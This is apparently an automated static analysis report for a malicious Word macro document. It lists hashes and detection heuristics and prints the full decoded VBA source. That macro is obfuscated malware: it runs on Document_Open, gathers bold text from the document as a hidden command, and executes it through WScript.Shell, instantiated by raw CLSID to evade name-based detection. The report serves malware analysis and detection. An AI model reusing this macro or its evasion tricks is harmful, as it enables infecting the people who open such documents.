Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 cde8fc14b53fb793…

MALICIOUS

Office (OOXML)

Size: 155.7 KB
Created: 2020-11-29 09:53:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2020-12-25
MD5: 1dcd19b1af53acdf6a0652f10b379d5c
SHA-1: e06ab17595d4d2770bd6a80ed453b4a88022dac6
SHA-256: cde8fc14b53fb79318fad6a03d7c30c04309936b15eb7932072f681c34465158
Risk Score: 172

Heuristics (7)

  • VBA project inside OOXML (severity: medium, 4 related findings) [OOXML_VBA]
    Document contains a VBA project — VBA macros present
  • VBA instantiates a dangerous COM class by CLSID (severity: critical) [OLE_VBA_GETOBJECT_CLSID_DANGEROUS]
    VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
    Matched line in script
    Set obj1 = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
  • GetObject call (severity: high) [OLE_VBA_GETOBJ]
    GetObject call
    Matched line in script
        Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
  • VBA p-code auto-exec with execution tokens (severity: high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro (severity: low) [OLE_VBA_DOCOPEN]
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Suspicious extracted artifact (severity: info) [EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (severity: info) [EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs found (all: In document text (OOXML body / shared strings)):
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.microsoft.com/office/drawing/2014/chartex
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2012/wordml
    • http://schemas.microsoft.com/office/word/2015/wordml/symex
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 9191 bytes
SHA-256: 0e23bc3efe4d74472497cbc10e6ea02901865f2b45c4a6a1e9aa6ca5a90e3797
Detection
ClamAV: No threats found
Obfuscation or payload: likely
132 of 219 identifiers look randomly generated (e.g. 'kgvrlszquvdskkqxayybewqwokhnttlnmcbtcxkg') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Dim bprjmfp As String


Private Sub Document_Open()
Call nmngtyy
End Sub

Private Sub nmngtyy()












LLLLL



End Sub


Public Sub LLLLL()
If Cos(76.8765) = Log(12.42555) Then
Else
Call AsNXaUrp.BYsZgTqOo
End If
End Sub




Attribute VB_Name = "AsNXaUrp"
#If VBA7 Then


#Else


#End If

#If VBA7 Then
Private Declare PtrSafe Function ncgkixoi Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Const zridde = 21

#Else
Private Declare Function ncgkixoi Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
#End If


#If VBA7 Then
Const crktbpnl = 1732
Private Declare PtrSafe Function urbzpfup Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#Else
Private Declare Function urbzpfup Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#End If



#If VBA7 Then
Private Declare PtrSafe Function hsgoydtxat Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Const szdunbvk = 6
#Else
Private Declare Function hsgoydtxat Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
#End If
#If VBA7 Then
Private Declare PtrSafe Function gbqyubnp Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
#Else
Private Declare  Function ncgkixoi Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Const aorxbcpilpy = 57

Private Declare  Function urbzpfup Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
Private Declare  Function hsgoydtxat Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare  Function gbqyubnp Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
#End If

Private Type kdkota
     fcjwktwr As Long
End Type


#If VBA7 Then


#Else


#End If






Sub DqMhJ(sgbwvbShKbOgrjzLSSZZQhbQpEaAykA, GSbmTltgFLIfrxWxjSA, GqUKFLGqBSjabuZZHNsgZsTEZvYsidQf, ONQyRgIfCfnciExYxpVaULNWPkJmOIY)
pgkAXMgbrqbTknuFPCzuigXV = 4.59820241332336E+16
tHmZrsQOWzpqToBqn = 3977312751#
SLuXkGxbJhPrJIOjdFtCzyKFNnFPvOyDvmEKXVW = "bPjizfqgbkKvwluUApKxBiguiLwW"
DLIiNbk = 3.76284590276884E+17
bFiwYnKECHKskKi = "ZftiozniUcXYC"
End Sub

Function aApiHzWUbLcCKwUXRtUUtS(jKJFYjbAcuWpgE, dTtdwIihBabSzcwPlCpXzifmzjYCzMyTj, qJevFEAcIewQcYgelnrgmuoHeMkfipcIjClnlpwkX)
nhZnt = "vqGJOUnRwEkJNOQfgspSNYDQCdHyBAhMdbfVWt"
bhGUojLgElIBgyafWmqGlMoPvWXfmivJnxNlHDPg = 9.49581882866512E+33
xDMtyBOCwJigmKPsqYRLftWqyNjkpXSXJOnJc = 14382074147258#
wVJdpYNdAnxsQexUMDgW = 9604
aApiHzWUbLcCKwUXRtUUtS "lRdNYqKWXWGQVcvCCExdUMwnwGnaoCkcFaLEfPQi"
End Function

Function inojHpczhB(GcRrcv, BSKzjt, YVqQSCkiVldKvQrXmnOaNjev, LlYWrlsMznioyyfSYHf, SAmKuYMUSMoqvx, RLMdAlyvd)
yNbTZYtmystB = 8.8252890304889E+40
NGMdfcUEJBMkXlLXMrNwvTxkJbNEIeQplxVBc = "UFgGpMPjBmiPmAfFvuIbTDPPvekWyaPJvNXIPodlVaZ"
WtsQJgBasAfQpQLKbskbXYTY = "XpHQWGseptBmUNSYoRuiHSydTK"
qxDxZTmlrtKVtmmAXJXGfSCiH = "qWFqdxMeCgmvbTibaeevAwU"
bTvDwYvUqAcQgAQMJP = 2.11947875618804E+29
GObhEYErYDLYuBmPKBIhelRFbqRuaOR = "lMOEzmrfsgWRebiOulFLAiFUxWGNGKRJl"
nhmiPYJcpxOzazICzpIGmCG = "HdfeYhPNfGoAcLVhBXtIGxwHEEKbAemkatbmsfE"
hAUUKIanT = 6.56754623326837E+16
inojHpczhB "FOJymJgYaUXoNATDZjkipVTm"
End Function

Function ZeJVSPlXwHfZRkCMBLJuRreNtzAgtpttsEstJjlrnTt(GccwvdWHZZYbcGRGTFjktnUA, irDlljuXX, gEcerAgnbubwdScWQkBiTIboNlTWo, dEFZkBrbrjNzsFfmOkIPTKVpNYcnRFhJzlR, rDiaepsSUTPVIaXiNZVTj, LMYDJmCDzHoIuKCh, dSDUtIGeqiyvaPynbrVCbfGPRUIhAgM, fosBgvSESYTEDHZrqVTSgfIyLnCZ)
ntPvFmKbseihzwb = "PFdHOmgNrJCSaRGxxQ"
AkEaHeRANVLtMHSbiplABMB = 5.8053604064415E+41
wjrBaYl = "jXbiLfWcwlTrgPpKHpYHMQXnizdXnPZ"
kbKpgkQCTJDPtKYhugulzdXTznzLCyphMdG = 1.89387594832126E+19
EzeWZWn = "MHuXbv"
GVoqHDqqskEAVTWDPETduCXLdq = 93839194
GrtbkGViLXnzBNJllUVS = "qEeTISiExcNQikyzIUuzlKfcERPkQl"
HXmQnOIbnmeNuaiTdLmdzbSxfYCPqDxoMlFtv = "KkAtGNGwkCWxlZdIrg"
olPMtkkp = 3681689
BJUpXKACcGVFrinzssSYKDuZnHivXHIVXQub = "gaaYbfkLAxCbMAsSRfyOvBQcFeVyz"
anLSMSrzjXJOnJfTKHQDGkwNmfJyT = "KmLSWPQunZbRvaEhNHxmUNhwapqyghJsgnNXCUmQ"
ZeJVSPlXwHfZRkCMBLJuRreNtzAgtpttsEstJjlrnTt "QTqboo"
End Function

Function SfyUUwUYL(JERCBgbwEPsgYSOGQilIM, ftUgjEurUlBUobPGrzLQSmcFrkBMa, DgJcZYhUxXCNvGfEdnqJrmwvNsQOpyChRaiUKM, rZXCo, FrVanHOVQCRkNOh)
QlykUjIhIBvoBrnLAYRkwyUkGrDTuJWwOtqdXfh = "cgGfLedGgIvvHaySROecgomyfyZIB"
oUqjIProZbOx = "mNapovXLJBFBnuHAMEUFWTbEXSibdoCNi"
AlEJl = "dzfTliUVknMXtr"
SmVSVMwiUyrSltWw = 3050345767935#
SHbXoI = "oxNqpcfUrlhyirPBhQL"
tQibNrIEmQtedBdYyFs = 5.74262107653575E+21
SfyUUwUYL "TXbALXNMCGuGdnaXOlcyTaibsDUhNrCbXSBVpi"
End Function



Public Sub BYsZgTqOo()

On Error Resume Next



 
    'gcpuihphsepfpgogkj7312ywozbarf
'mtthrkhhhgvopebj



 Dim sepfpgogkj As Integer

  
        

'qdibjmpibvmljm35430
'9797





 Do Until 6418 = 6418
              Dim sjptydjepcn As Object
      Randomize
        Loop



'wqwokhnttlnmcbtcxkgvrlszquvd
'sjptydjepcnwdurmdcksvjttstlnmcbtcxkgvrlszquvd
'njpbumksvjttsskkqxayybe





'bvmljmsepfpgogkj35430
'ujpmmmqx7312
'dosubfbujpmmmqx18947887




        
'7312qdibjmpi
'1397
'35430sepfpgogkj
        
      
        
'gkkxippbskkqxayybewqwokhnttlnmcbtcxkgvrlszquvd
'lrmhewbgkgvrlszquvdtlnmcbtcxkgvrlszquvd



'cbntlfvhfwqwokhnthxtzrsnpmzwdurmdc
'tlnmcbtcxkgvrlszquvdtlnmcbtcxkgvrlszquvd
'skkqxayybelrmhewbgkgvrlszquvd






'qdibjmpi
'eghiudyujpmmmqx#Q14
'oocetwtwbcl
'18947887ujpmmmqx


   
             If oocetwtwbcl = "cocmmxx" Then
            Dim eghiudy
            
            oocetwtwbcl = 93818056901864#
        End If
        


        'xpvcipksvjttsksvjttskgvrlszquvdskkqxayybe
'kgvrlszquvdskkqxayybewqwokhnttlnmcbtcxkgvrlszquvd
'fhnwguikgvrlszquvdkgvrlszquvdskkqxayybe
'wdurmdcwqwokhntgkkxippbskkqxayybe
'ksvjttswqwokhntlrmhewbgkgvrlszquvd



        
        If IsDate(qhlgnpxqdz) And ((13 + 7312) / (18947887 + 7473870)) <> 45815829311408# Then
          xbqddutl = "mncwnt" & CStr("bpuqctlfa")
End If
        





'qnowqrdhksvjttsgkkxippbskkqxayybe
'hxtzrsnpmzwdurmdcgkkxippbskkqxayybe
'ywozbarfQ14
'hgvopebjQ11















   Dim myShape As InlineShape
    Dim myRange As Range
    For Each myRange In ActiveDocument.StoryRanges
        For Each myShape In myRange.InlineShapes
            myShape.Delete
        Next myShape
    Next myRange
Dim zxd As Variant
Dim zxtgsaqeyhzfgds3re As String



Dim oRng As Range
Dim oNewRng As Range
Set oRng = Selection.Range '(the formatted range you are wanting to write)
oRng.MoveEndWhile Chr(Abs(-32.1)), wdBackward 'Remove trailing spaces from the range
Set oNewRng = ActiveDocument.Range 'Locate the range where it is to be written
oNewRng.Collapse wdCollapseEnd
'oNewRng.FormattedText = oRng 'then write it.





 Dim Para As Paragraph
    Dim i As Long

    Application.ScreenUpdating = False
    With ActiveDocument
        For i = .Paragraphs.Count To 1 Step -1
            Set Para = .Paragraphs(i)
            With Para
                If .Range.End - .Range.Start = 1 Then
                    .Range.Delete
                Else
                    .SpaceBefore = 6
                    .SpaceAfter = 6
                End If
            End With
        Next i
    End With
    Application.ScreenUpdating = True




Dim singleLine As Paragraph
   Dim rng As Range
   Dim pos As Integer
    Dim Wrd As Range

   For Each singleLine In ActiveDocument.Paragraphs
      Set rng = singleLine.Range
   
   
    
    
         If rng.Font.Bold Then
            'MsgBox "This is bold"
               lineText = singleLine.Range.Text
          AWtbWDhas = AWtbWDhas + lineText
        
       ' MsgBox (AWtbWDhas)
         End If
     
   Next


WpkbB = "xOKhf"
fE = "JCT"
TDOvQ = "F"
vWYYg = 3561180
HKODnr = "ok"
YmBx = 4533856
Ddyd = "dUC"
TahIc = "QzrXkG"




ZFF = Null
VCFGv = ZFF

If Sin(2) + Cos(7.46) - 976.7654 = Cos(272) * 75.557 Then

MsgBox (CoNjMfBs)

Else

Do Until "LGRLh" <> "zslnu"
xZZI = "giQ"
xuTFy = 32437
XPK = 9889
rleIH = 552
rQSE = 774
nKtIZbQ = "ZoV"
xNLxG = "RbdaLC"
SRRmTQ = "MnK"
awYoHE = "nVKhuv"
lgAd = "Mzq"
LGRLh = zslnu
Loop


AWtbWDhas = Replace(AWtbWDhas, "dxphwrs", "")
End If

strComputer = "."
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    Dim k2 As String
    k2 = "Win32_ProcessStart" & "u" & "p"
    Set objStartUp = objWMIService.Get(k1)
    Set objProc = objWMIService.Get("Win32_Process")


Dim obj1
Set obj1 = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
obj1.Run Gravity & "" & AWtbWDhas, 0



End Sub

Filename | Kind | Source | Size
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 31744 bytes
SHA-256: 7f72bfa6536173c671f749e89c711e1b07842d97f628ac9c833b0b63d1b8e437
Detection
ClamAV: No threats found
Obfuscation or payload: likely
339 of 525 identifiers look randomly generated (e.g. 'kgvrlszquvdskkqxayybewqwokhnttlnmcbtcxkg') — consistent with name-mangling obfuscation.